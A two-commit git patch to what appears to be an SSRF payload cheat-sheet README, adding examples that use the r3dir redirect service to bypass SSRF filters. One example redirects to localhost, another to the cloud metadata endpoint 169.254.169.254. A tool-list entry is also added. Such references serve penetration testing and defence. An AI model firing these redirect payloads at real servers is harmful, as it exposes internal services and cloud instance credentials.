From 4cf17a3fab35460a4142ee5ff179c54dbb8d8988 Mon Sep 17 00:00:00 2001 From: Horlad <62111809+Horlad@users.noreply.github.com> Date: Thu, 27 Jun 2024 16:57:45 +0200 Subject: [PATCH 1/2] Update SSRF with redirect examples using r3dir README.md --- Server Side Request Forgery/README.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 2f2bc292..f8d11873 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -263,6 +263,16 @@ vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 3. You can use response codes [307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain HTTP method and body after the redirection. ``` +To perform redirects without hosting own redirect server or perform seemless redirect target fuzzing, use https://github.com/Horlad/r3dir which hosted on r3dir.me + +```powershell +#Redirects to http://localhost with `307 Temporary Redirect` status code +https://307.r3dir.me/--to/?url=http://localhost + +#Redirects to http://169.254.169.254/latest/meta-data/ with `302 Found` status code +https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me +``` + ### Bypassing using type=url ```powershell @@ -929,4 +939,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080) - [Pong [EN]| FCSC 2024 - vozec - April 12, 2024](https://vozec.fr/writeups/pong-fcsc2024-en/) - [Pong [EN]| FCSC 2024 - mizu.re - Apr 13, 2024](https://mizu.re/post/pong) -- [SSRFmap - Introducing the AXFR module - Swissky - June 13, 2024](https://swisskyrepo.github.io/SSRFmap-axfr/) \ No newline at end of file +- [SSRFmap - Introducing the AXFR module - Swissky - June 13, 2024](https://swisskyrepo.github.io/SSRFmap-axfr/) From b521dedb24c9993b9af21ca5a44069432e6fadc0 Mon Sep 17 00:00:00 2001 From: Horlad <62111809+Horlad@users.noreply.github.com> Date: Thu, 27 Jun 2024 17:01:41 +0200 Subject: [PATCH 2/2] Adding r3dir tool to SSRF README.md --- Server Side Request Forgery/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index f8d11873..7e8d6955 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -63,8 +63,9 @@ - [tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) - Generates gopher link for exploiting SSRF and gaining RCE in various servers - [In3tinct/See-SURF](https://github.com/In3tinct/See-SURF) - Python based scanner to find potential SSRF parameters - [teknogeek/SSRF Sheriff](https://github.com/teknogeek/ssrf-sheriff) - Simple SSRF-testing sheriff written in Go -* [assetnote/surf](https://github.com/assetnote/surf) - Returns a list of viable SSRF candidates -* [dwisiswant0/ipfuscator](https://github.com/dwisiswant0/ipfuscator) - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go. +- [assetnote/surf](https://github.com/assetnote/surf) - Returns a list of viable SSRF candidates +- [dwisiswant0/ipfuscator](https://github.com/dwisiswant0/ipfuscator) - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go. +- [Horlad/r3dir](https://github.com/Horlad/r3dir) - a redirection service designed to help bypass SSRF filters that do not validate the redirect location. Intergrated with Burp with help of Hackvertor tags ## Payloads with localhost